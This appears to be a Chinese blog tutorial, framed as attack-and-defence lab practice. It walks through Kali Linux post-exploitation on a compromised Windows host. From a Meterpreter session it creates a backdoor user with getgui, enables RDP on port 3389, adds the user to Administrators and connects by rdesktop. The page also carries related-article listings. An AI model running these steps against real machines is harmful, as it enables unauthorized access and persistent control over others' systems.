网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战

最新推荐文章于 2024-06-12 16:09:46 发布
最新推荐文章于 2024-06-12 16:09:46 发布
阅读量3.2k 收藏 49
点赞数 4
分类专栏: 科技 黑客 IT技术 文章标签: 网络 计算机视觉 信息安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/108533612
版权
黑客 同时被 3 个专栏收录
192 篇文章 32 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

一、背景介绍
在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意操作呢?如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习!
二、资源装备
1.安装好Kali Linux的虚拟机一台;
2.已经被控制的Windows主机一个;
3.整装待发的小白一个。
三、战略安排
3.1查看kali虚拟机sessions状况,如下图所示。
命令:sessions
c
在这里插入图片描述

3.2 在受害者主机执行病毒文件,如下图所示。
步骤:双击如下图所示的文件
在这里插入图片描述

3.3 再次在Kali Linux中执行sessions命令,如下图所示。
命令:sessions
在这里插入图片描述

3.4 执行命令,给受害者主机创建用户,如下图所示。
命令:sessions -i 5
run getgui -u 用户名 -p 密码
Eg: run getgui -u hacker -p 123456
在这里插入图片描述

3.5 执行getgui脚本文件,开启受害者主机3389端口(远程桌面连接端口),如下图所示。
命令:run getgui -e
在这里插入图片描述

3.5.1 执行结果如下图所示。
在这里插入图片描述

3.6 查看受害者主机的ip地址,如下图所示。
命令:ipconfig
在这里插入图片描述

3.7 连接受害者主机的远程桌面,如下图所示。
命令:rdesktop 192.168.0.107:3389
在这里插入图片描述

3.7.1 登录窗口如下图所示,根据创建的用户进行登录
在这里插入图片描述

3.8 遇到创建的用户不是管理员组用户的问题,如下图所示
在这里插入图片描述

3.9 解决升级管理员权限的问题
3.9.1 启动dos窗口
命令:shell
在这里插入图片描述

3.9.2 升级管理员用户,如下图所示。
命令:localgroup administrators 用户名 /add
Eg :localgroup administrators hacker /add
在这里插入图片描述

3.9.3 解决乱码问题,如下图所示。
命令:chcp 65001
在这里插入图片描述

3.10 继续登录,如下图所示。
3.10.1 登录界面
4

3.10.2 选择是
在这里插入图片描述
在这里插入图片描述

3.11 渗透成功,如下图所示。

在这里插入图片描述
在这里插入图片描述

辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 4
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
KaliLinux安全渗透教程(完整版)
04-26
第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 与 升 级 1.6 基 本 设 置 第 2 章 配 置 K ali Lin u x 2.1 准 备 内 核 头 文 件 2.2 安 装 并 配 置 N VIDIA 显 卡 驱 动 2.3 应 用 更 新 和 配 置 额 外 安 全 工 具 2.4 设 置 P r o x y C h ain s 2.5 目 录 加 密 第 3 章 高 级 测 试 实 验 室 3.1 使 用 V M w a r e W o r k s t a tio n 3.2 攻 击 W o r d P r e s s 和 其 他 应 用 程 序 第 4 章 信 息 收 集 4.1 枚 举 服 务 4.2 测 试 网 络 范 围 4.3 识 别 活 跃 的 主 机 4.4 查 看 打 开 的 端 口 4.5 系 统 指 纹 识 别 4.6 服 务 的 指 纹 识 别 4.7 其 他 信 息 收 集 手 段 4.8 使 用 M alt e g o 收 集 信 息 4.9 绘 制 网 络 结 构 图 第 5 章 漏 洞 扫 描 5.1 使 用 N e s s u s 5.2 使 用 O p e n VA S 第 6 章 漏 洞 利 用 6.1 M e t a s ploit a ble 操 作 系 统 6.2 M e t a s ploit 基 础 6.3 控 制 M e t e r p r e t e r 6.4 渗 透 攻 击 应 用 大 学 霸 K ali Lin u x 安 全 渗 透 程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.9 物理访问攻击 第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具
kali linux安全渗透教程
ITSM/ITIL/网络安全/IT运维
07-08 3961
第1章 Linux安全渗透简介 渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如设计缺陷和技术缺陷。本章将简要介绍Linux安全渗透安全渗透工具的相关内容。其主要知识点如下: 什么是安全渗透安全渗透所需的工具; Kali Linux简介; 安装Kali LinuxKali更新与升级; 基本设置。 1.1 什么是安全渗透 渗透测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是,渗透测试是通过模拟恶意黑客的攻击
Kali渗透实战:3分钟搞定Kali Linux安装,超详细教程(附安装包)
最新发布
admin_man的博客
06-12 1126
相信很多同学在刚接触网络安全的时候,都听过kali linux的大名!
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
Kali Linux】高级渗透测试实战
小洁洁
09-01 5367
>对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安全建设过程中的防护短板,检验安全应急预案的有效性并持续优化,为业务发展提供更强的保驾护航能力。
Kali Linux渗透测试技术详解_渗透测试入门
ZL_1618的博客
03-21 1442
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
渗透测试-Kali Linux学习(Linux基础、Shell编程、渗透测试软件)
关注网络安全、云原生安全
01-18 1万+
目录结构 Linux的目录结构,类似于一棵树,根节点是“/”。 总览 打开“文件系统根目录” 或者 root@frank:/# cd / root@frank:/# ls 可查看根目录下的文件, 蓝色表示目录; 绿色表示可执行文件,包括.sh,.py等; 红色表示压缩文件,包括.zip、.tar等; 浅蓝色表示链接文件; 灰色表示其它文件,包括.conf,.db,.img,.old等; 黄色是设备文件,包括block, char, disk等。 bin 存放命令/可执行文
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防渗透测试
kali_linux渗透测试视频教程(10套教程).txt
04-06
10套独家渗透测试视频教程,熟练掌握Kali_Linux及metasploit渗透测试工具及渗透测试实战技巧,另赠送Kali_Linux web渗透测试实战材一套,metasploit渗透测试魔鬼训练营材一套。
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
The COVID-19 pandemic has changed the way the world operates. Organizations of all sizes have transformed themselves from having none or partial remote working to all of their employees ...
kali+linux安全渗透测试教程
04-07
主要讲解了kaliLinux的基本命令和用法,讲解了安全渗透教程这些
Kali Linux安全渗透教程新手版
01-12
渗透测试的好工具!!详细讲解kali系统中的各种渗透测试工具的使用方法,很实用。
Kali Linux渗透测试实训手册
11-08
Kali Linux渗透测试实训手册,Kali Linux渗透测试实训手册,
基于Kali Linux渗透测试.pdf
09-06
Kali Linux可以帮助测试人员快速地进行渗透测试,并对系统的安全进行评估。 6. 渗透测试的优势 渗透测试可以帮助系统管理员和开发人员发现系统中的安全漏洞,并且可以评估系统的安全性。渗透测试可以减少经济...
信息安全技术 -kali渗透测试02
huangyushuai的博客
06-16 171
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(2)查找与office_word有关的渗透模块。
利用Kali 完成一次简单的渗透
热门推荐
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
网络攻防之ping命令
流楚丶格念的博客
04-11 4154
PING 命令 用来检查网络是否通畅或者网络连接速度的命令。网络上的机器都有唯一确定的 IP地址,给目标 IP 地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包可以确定目标主机的存在。 用法: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] [-R] [-S srcaddr] [-
实战指南:利用Kali Linux进行渗透测试
《利用Kali进行黑客攻击:实战渗透测试技术》是一本由James Broad和Andrew Bindner合著的专业书籍,它全面指导读者通过当前最先进的Live CD/USB系统Kali Linux进行渗透测试。本书旨在提供一个实用且深入的指南,帮助...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值